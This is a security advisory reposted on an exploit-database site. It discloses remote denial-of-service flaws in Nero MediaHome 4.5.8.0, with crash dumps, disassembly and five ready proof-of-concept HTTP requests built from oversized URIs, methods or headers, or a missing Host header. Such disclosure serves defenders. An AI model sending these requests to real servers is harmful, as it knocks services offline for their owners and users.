[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability

Author
High-Tech Bridge
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20143
Category
dos / poc
Date add
10-01-2013
CVE
CVE-2012-5876
CVE-2012-5877
Platform
windows
Product: Nero MediaHome
Vendor: Nero
Vulnerable Version(s): 4.5.8.0 and probably prior
Tested Version: 4.5.8.0 in Windows 7 SP1
Vendor Notification: November 21, 2012 
Public Disclosure: January 9, 2013 
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]
CVE References: CVE-2012-5876, CVE-2012-5877
CVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Low 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.


1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876

1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.

Crash details:

EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 (  62040072) ->  (heap)
EBX: 003e0000 (   4063232) ->   b@>@>" (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b2b000 (  62042112) -> D (heap)
ESI: 03b2a800 (  62040064) ->  (heap)
EBP: 0526f854 (  86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 (  86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 (   4063232) ->   b@>@>" (heap)
+04: 00000022 (        34) -> N/A
+08: 003e0004 (   4063236) ->   b@>@>" (heap)
+0c: 0526f88c (  86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A


Disasm around:

  0x7c921664 mov ecx,[ebp+0x10]
  0x7c921667 add eax,[ecx]
  0x7c921669 cmp eax,0xfe00
  0x7c92166e ja 0x7c920721
  0x7c921674 cmp byte [ebp+0x14],0x0
  0x7c921678 jnz 0x7c95ae10
  0x7c92167e mov ecx,[esi+0xc]
  0x7c921681 lea eax,[esi+0x8]
  0x7c921684 mov edx,[eax]
  0x7c921686 mov [ebp+0x8],ecx
  0x7c921689 mov ecx,[ecx]
  0x7c92168b cmp ecx,[edx+0x4]
  0x7c92168e mov [ebp+0xc],edx
  0x7c921691 jnz 0x7c921734
  0x7c921697 cmp ecx,eax
  0x7c921699 jnz 0x7c921734
  0x7c92169f push esi
  0x7c9216a0 push ebx
  0x7c9216a1 call 0x7c920684
  0x7c9216a6 mov eax,[ebp+0xc]
  0x7c9216a9 mov ecx,[ebp+0x8]


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None



1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.

Crash details:

EIP: 7c921689 mov ecx,[ecx]
EAX: 03b63008 (  62271496) ->  (heap)
EBX: 003e0000 (   4063232) -> #  8@>+ (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b64000 (  62275584) -> B (heap)
ESI: 03b63000 (  62271488) ->  (heap)
EBP: 0527f864 (  86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)
ESP: 0527f858 (  86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)
+00: 003e0000 (   4063232) -> #  8@>+ (heap)
+04: 00000021 (        33) -> N/A
+08: 003e0004 (   4063236) -> #  8@>+ (heap)
+0c: 0527f89c (  86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A


Disasm around:

  0x7c921664 mov ecx,[ebp+0x10]
  0x7c921667 add eax,[ecx]
  0x7c921669 cmp eax,0xfe00
  0x7c92166e ja 0x7c920721
  0x7c921674 cmp byte [ebp+0x14],0x0
  0x7c921678 jnz 0x7c95ae10
  0x7c92167e mov ecx,[esi+0xc]
  0x7c921681 lea eax,[esi+0x8]
  0x7c921684 mov edx,[eax]
  0x7c921686 mov [ebp+0x8],ecx
  0x7c921689 mov ecx,[ecx]
  0x7c92168b cmp ecx,[edx+0x4]
  0x7c92168e mov [ebp+0xc],edx
  0x7c921691 jnz 0x7c921734
  0x7c921697 cmp ecx,eax
  0x7c921699 jnz 0x7c921734
  0x7c92169f push esi
  0x7c9216a0 push ebx
  0x7c9216a1 call 0x7c920684
  0x7c9216a6 mov eax,[ebp+0xc]
  0x7c9216a9 mov ecx,[ebp+0x8]


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

HEAD / [A * 265696] HTTP/1.1
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None



1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.

Crash details:

EIP: 7c920a1b cmp ecx,[edx+0x4]
EAX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBX: 003e0000 (   4063232) ->   @>+ (heap)
ECX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EDX: 03b50101 (  62193921) -> N/A
EDI: 03c1bb30 (  63028016) -> yDPyDh8yDh >>#H"G^^^^o^I@_l (heap)
ESI: 03c1bb88 (  63028104) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBP: 033bfc78 (  54262904) -> L;L (stack)
ESP: 033bfc6c (  54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)
+00: 003e0000 (   4063232) ->   @>+ (heap)
+04: 03c1bb78 (  63028088) ->  >>#H"G^^^^o^I@_lhf19fPf36dLa (heap)
+08: 00000000 (         0) -> N/A
+0c: 033bfd4c (  54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)
+10: 7c92084c (2089945164) -> N/A
+14: 03adb908 (  61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)


Disasm around:

  0x7c9209fe mov al,[esi+0x5]
  0x7c920a01 and al,0x10
  0x7c920a03 test al,0x10
  0x7c920a05 mov [edi+0x5],al
  0x7c920a08 jnz 0x7c920aa0
  0x7c920a0e mov ecx,[esi+0xc]
  0x7c920a11 lea eax,[esi+0x8]
  0x7c920a14 mov edx,[eax]
  0x7c920a16 mov [ebp+0xc],ecx
  0x7c920a19 mov ecx,[ecx]
  0x7c920a1b cmp ecx,[edx+0x4]
  0x7c920a1e mov [ebp+0x14],edx
  0x7c920a21 jnz 0x7c921752
  0x7c920a27 cmp ecx,eax
  0x7c920a29 jnz 0x7c921752
  0x7c920a2f push esi
  0x7c920a30 push ebx
  0x7c920a31 call 0x7c920684
  0x7c920a36 mov eax,[ebp+0x14]
  0x7c920a39 mov ecx,[ebp+0xc]
  0x7c920a3c cmp eax,ecx


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

OPTIONS / [A * 265712]
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.host.com



1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. 

Crash details:

EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 (  63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 (   4063232) ->   Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 (  63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 (  63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 (  86505512) -> `' (stack)
ESP: 0527f81c (  86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
  +00: 003e0000 (   4063232) ->   Tp@>+ (heap)
  +04: 00000021 (        33) -> N/A
 +08: 003e0004 (   4063236) ->   Tp@>+ (heap)
   +0c: 0527f860 (  86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
   +10: 7c928ccd (2089979085) -> N/A
   +14: 03ad5600 (  61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)


Disasm around:

  0x7c9209f8 jnz 0x7c95af5f
  0x7c9209fe mov al,[esi+0x5]
  0x7c920a01 and al,0x10
  0x7c920a03 test al,0x10
  0x7c920a05 mov [edi+0x5],al
  0x7c920a08 jnz 0x7c920aa0
  0x7c920a0e mov ecx,[esi+0xc]
  0x7c920a11 lea eax,[esi+0x8]
  0x7c920a14 mov edx,[eax]
  0x7c920a16 mov [ebp+0xc],ecx
  0x7c920a19 mov ecx,[ecx]
  0x7c920a1b cmp ecx,[edx+0x4]
  0x7c920a1e mov [ebp+0x14],edx
  0x7c920a21 jnz 0x7c921752
  0x7c920a27 cmp ecx,eax
  0x7c920a29 jnz 0x7c921752
  0x7c920a2f push esi
  0x7c920a30 push ebx
  0x7c920a31 call 0x7c920684
  0x7c920a36 mov eax,[ebp+0x14]
  0x7c920a39 mov ecx,[ebp+0xc]


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]



2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877

2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.

Crash details:

EIP: 10003171 mov [eax+0x18],ebp
  EAX: 00000000 (         0) -> N/A
  EBX: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
  ECX: 039cddea (  60612074) -> localhost (heap)
  EDX: 039cddea (  60612074) -> localhost (heap)
  EDI: 037bc888 (  58443912) -> ||{sP@OQ6E}{AY+ (heap)
  ESI: 037c7fb0 (  58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
  EBP: 00000009 (         9) -> N/A
  ESP: 0563fad0 (  90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
  +00: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
  +04: 039cdde8 (  60612072) ->  localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
  +08: 00000000 (         0) -> N/A
  +0c: 00000001 (         1) -> N/A
  +10: 000000b8 (       184) -> N/A
  +14: 037c7318 (  58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)


Disasm around:

  0x10003156 mov edx,[esi+0x8]
  0x10003159 mov ebp,[esi+0xc]
  0x1000315c push byte 0x1
  0x1000315e push eax
  0x1000315f push ecx
  0x10003160 push ebx
  0x10003161 mov [edi+0x40],esi
  0x10003164 mov [esp+0x2c],edx
  0x10003168 call 0x10002730
  0x1000316d mov ecx,[esp+0x2c]
  0x10003171 mov [eax+0x18],ebp
  0x10003174 mov ebp,[esp+0x24]
  0x10003178 add esp,0x10
  0x1000317b mov [eax+0x14],ecx
  0x1000317e mov edx,[ebp+0x8]
  0x10003181 test edx,edx
  0x10003183 mov [esp+0x14],edx
  0x10003187 jnz 0x10002ff0
  0x1000318d mov eax,[esp+0x24]
  0x10003191 push eax
  0x10003192 call 0x10002c20


Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:

GET / HTTP/1.1
: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com


-----------------------------------------------------------------------------------------------

Solution:

Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."

As a temporary solution it is advised to remove the vulnerable application from your system.

-----------------------------------------------------------------------------------------------

#  0day.today [2024-11-16]  #